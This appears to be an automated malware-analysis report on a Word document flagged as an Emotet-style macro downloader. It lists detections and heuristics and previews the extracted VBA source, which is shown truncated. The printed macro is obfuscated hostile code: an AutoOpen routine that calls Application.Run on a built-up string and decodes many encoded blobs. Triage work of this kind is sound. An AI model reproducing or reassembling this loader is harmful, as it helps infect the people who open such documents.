Verdict: MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code as soon as the document is opened. The macro attempts to execute a second-stage payload by calling Application.Run with a dynamically constructed string, most likely to download and run further malicious content. The ClamAV detection and the heuristic firings strongly indicate malicious intent.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 145242 bytes |

SHA-256: 6a7512a99a913ea9fd734cf998ff3d168a3ae2f815226439690d8f342714fde8

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 46 long base64-like blob(s))
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "zSCwnFfK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
dmGOs = CByte(vtQhZ)
otYWT = FPLsf
oqjRU = Cos(26532 - Oct(25179 + kdUBz * Scquf - CBool(zbwPNK)))
Application.Run aXTNl + "FCsdtDpiBrtboj" + saCqd, CUDZL + tVZimvCb + XXCBd
QMpQM = CByte(REKtmw)
QjuGq = lMVcV
CnqqmS = Cos(47253 - Oct(88816 + zYRbNK * ZOJiE - CBool(vpdRL)))
End Sub
Attribute VB_Name = "rMukUXKEaNXa"
Sub EWSLc(cGMmGT)
pusBMV = CByte(mChCo)
EDFwLr = UAkcdA
iffZoR = Cos(63193 - Oct(64863 + MZBBT * CpQXja - CBool(ANbOk)))
End Sub
Function tVZimvCb()
On Error Resume Next
CwvjTJ = CByte(pfGQQ)
dnIYt = lDKOL
vzBZnb = Cos(38210 - Oct(53010 + UwprR * iUPDDY - CBool(kKiHI)))
mIzMjl = UjcSm("nQjDj1EANAA1ADYAMgBiADMAMAA5ADMAOQBlADkAZAAzADQANwBjADUAOABkzvt", 7 + YMSfR - YMSfR, 54 + YMSfR - YMSfR)
TXrikp = CByte(MEPsf)
oMJoTh = cDjuLH
tNqrf = Cos(36447 - Oct(76818 + jcQEC * adEXXG - CBool(obWPaj)))
LcEjvr = CByte(bKnkB)
EKABqO = iEkZN
tUMzj = Cos(51868 - Oct(60895 + PGXzd * XVwmn - CBool(DwTmuc)))
wsKrzOmiJ = UjcSm("da,kADMAMQBiADIAMQA0ADEAYgAzADAAZABmADkAYgAyAGQAMAA2ADAAMwBlAGMAYwA2ADMANQA0ADEAMgBlADIANgA2ADAAYwA1AGQAZQAyADIANQAwADYANwBjADMAZAAzADDo", 6 + QnzWc - QnzWc, 129 + QnzWc - QnzWc)
oQGri = CByte(ZwBOL)
JVZpD = DMtwNI
lYSwBa = Cos(8867 - Oct(8929 + rtIPs * DXWGlf - CBool(SdHPJq)))
SsNLr = CByte(hCnwiu)
nfIJt = PqKIFH
QwvHFk = Cos(73768 - Oct(30426 + ZzCht * spsnZV - CBool(fswwF)))
dCwfb = UjcSm("ohwBmADkAOQA5AGIANwAzADgAMgBhAGYAYQBmADMAZAAyAGEAZgA4AGMAOQBiAGMAMwBlADQANQA0ADgAMABiAGUAMwA2AGEAMABmADQAYwBmADYANABhADAAZQBYp%YpUb", 3 + RpCwt - RpCwt, 122 + RpCwt - RpCwt)
iHjHD = CByte(ilHfq)
HzOGIG = sjwVQ
iTGQC = Cos(22165 - Oct(18771 + NlRpsw * KukJBo - CBool(WvZkp)))
iVuJu = CByte(NiwoYn)
nDTra = RwtrO
AziOG = Cos(8258 - Oct(28194 + ljFIBI * DunKiO - CBool(VPZVCi)))
mMpjp = UjcSm("o. myAGMANwA1ADQANwAwADIAMQBhADcAZABlAGYAZAA1AGYANgAyAGIAMwBkADQAYgBlAGIANwA2ADkAYQBlADUAZABjADAANAA3AGUAOABmADMAZgAwAGIAYwA5ADkAOAA4ADgANQAxADUAYQAzADcANwBiAGEANABhADQAjJ", 5 + MpjmSp - MpjmSp, 165 + MpjmSp - MpjmSp)
Spijsu = CByte(jUsjJJ)
EwLqSJ = BFhjD
iPolB = Cos(69083 - Oct(92539 + tacJO * UavaY - CBool(NRQOi)))
JFsFF = CByte(KktzMl)
kdRCfp = bnGjHz
jzVjK = Cos(7726 - Oct(55195 + kMsPLp * RlCOIW - CBool(QzNpfm)))
jBpwM = UjcSm("3rkANQAyAGMANgA0ADYAZAA3AGUAMwBmAGQAYgAyAGMANwBkADQAMAA2ADgANQBhAGUAMABlADAANQA1ADkAMAA3ADIAMQAzADgAYgBiADgAMAAxADEAZAAzAGIANQBjAGQAMAAwAGIAYgA0ADMANAA5AGQAO2qJU8", 3 + VUQjzA - VUQjzA, 154 + VUQjzA - VUQjzA)
zLzIT = CByte(lXQChJ)
sEJPd = uVVit
DAiXVU = Cos(46770 - Oct(80597 + lAuHr * vtUAh - CBool(VqMozL)))
nJCaO = CByte(iizEn)
OwJtXN = BuIJDj
BUPvn = Cos(81167 - Oct(5082 + FUfpRF * pQQpVW - CBool(LRasE)))
CXMINBbh = UjcSm("L1ErGEAOABhADIAOAAzADgAZQA2AGYAMwBjADUAYwBkADUANgA3ADQANAAxAGQAMgA2AGQANQA4ADcAOAAxADAAOQAxADgANABhAGQANAAzAGYAZgA4AGUAZAAwADQAYwAwADgAMABjADAAMAA2ADcAZABmADMAMgA1ADQAMgA0AGQAMgA5ADQAOQA5AGYAYQA4tj", 5 + sAihET - sAihET, 191 + sAihET - sAihET)
Rizwr = CByte(JNTERz)
WtpNhv = LEssO
wbJwU = Cos(89139 - Oct(71837 + bbUhwX * cWLzru - CBool(jWDsw)))
XtjlXR = CByte(wlllz)
LhdIaU = YNYmu
vitTww = Cos(91935 - Oct(41787 + CFfCpB * zvqHw - CBool(NjCGk)))
pqRsjnhF = UjcSm("AjhADUAYgA0ADgANwAyADUAZAA4ADAAZgA3ADIAZQBjADUAZQA0AGEAZAA5AGEAZAAzADcAMwBhAGYAMQBmAGEAZQBmADkAYQAxADkAYQA0AGQAZgA5ADEAOQBjADEANQBlAGEAMAA2ADQAOAA2AGUAZQBhADkANgA4AGMAO%bSq4", 3 + NMlHjd - NMlHjd, 166 + NMlHjd - NMlHjd)
SJUuq = CByte(WuERom)
PYiXd = iBPQd
nstQKR = Cos(80272 - Oct(26807 + DdiKoT * GEfGE - CBool(hiiLY)))
OLEqf = CByte(AJdLwH)
VDRzch = ZQOZH
jzfCb = Cos(3592 - Oct(82934 + GzOpj * uzOFGF - CBool(jzmdrk)))
BsQpVXRtmbw = UjcSm("QFYwBjADQANwA2AGMANgBmAGEAYgA0ADAAYgBlADcAYQBjADIAOQBlAGQAZQBhADYAMwBkAGUAZgAyADUAN2S8j", 3 + GODtrz - GODtrz, 81 + GODtrz - GODtrz)
iwwfiF = CByte(Cdakw)
WPGDI = iTcCJT
pwztZ = Cos(70220 - Oct(34193 + aIAjG *
... (truncated)